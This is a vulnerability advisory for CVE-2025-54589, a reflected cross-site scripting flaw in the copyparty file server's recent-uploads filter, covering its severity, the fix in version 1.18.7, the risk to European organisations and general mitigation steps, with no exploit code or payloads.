CVE-2025-54589 is a reflected Cross-Site Scripting (XSS) vulnerability identified in the copyparty portable file server software, versions 1.18.6 and below. The vulnerability exists on the recent uploads page accessed via the '/?ru' URL path, where users can filter displayed results using an input field. This input field appends a filter parameter directly into the URL, which is then reflected inside a <script> block on the page without proper sanitization or escaping. This improper neutralization of input (CWE-79) allows an attacker to inject arbitrary JavaScript code that executes in the context of the victim's browser. Both authenticated and unauthenticated users are vulnerable to this attack vector, increasing the risk of exploitation. The reflected XSS can lead to theft of session cookies, user impersonation, defacement, or redirection to malicious sites. The vulnerability has been assigned a CVSS v3.1 base score of 6.3 (medium severity), reflecting network attack vector, low attack complexity, no privileges required, but user interaction needed, and impacts on confidentiality, integrity, and availability. The issue was fixed in copyparty version 1.18.7 by properly escaping or sanitizing the filter parameter before embedding it into the script block. There are no known exploits in the wild as of the published date, and no direct patch links are provided, but upgrading to 1.18.7 or later is recommended.

For European organizations using copyparty as a portable file server, this vulnerability poses a moderate risk. Exploitation could allow attackers to execute arbitrary scripts in users' browsers, potentially leading to session hijacking, unauthorized access to sensitive files, or distribution of malware. Since copyparty is often used for file sharing and collaboration, an attacker could leverage this vulnerability to compromise user accounts or spread malicious payloads within an organization. The fact that unauthenticated users can trigger the vulnerability increases the attack surface, especially for publicly accessible instances. Confidentiality of shared files and user credentials could be compromised, integrity of data could be undermined by injecting malicious scripts, and availability could be affected if attackers use the vulnerability to launch further attacks or disrupt service. European organizations relying on copyparty for internal or external file sharing should consider this vulnerability a significant concern, particularly in sectors handling sensitive or regulated data such as finance, healthcare, or government.

1. Upgrade copyparty installations to version 1.18.7 or later immediately to apply the official fix that properly sanitizes the filter input. 2. If immediate upgrade is not feasible, implement web application firewall (WAF) rules to detect and block suspicious input patterns targeting the filter parameter on the '/?ru' page. 3. Conduct input validation and output encoding on any user-supplied data reflected in web pages, especially within script blocks, to prevent injection. 4. Restrict access to the copyparty server to trusted networks or VPNs to reduce exposure to unauthenticated attackers. 5. Educate users about the risks of clicking on suspicious links or URLs containing unexpected parameters. 6. Monitor logs for unusual requests to the recent uploads page with suspicious filter parameters that could indicate attempted exploitation. 7. Regularly audit and update all third-party software components to ensure known vulnerabilities are patched promptly.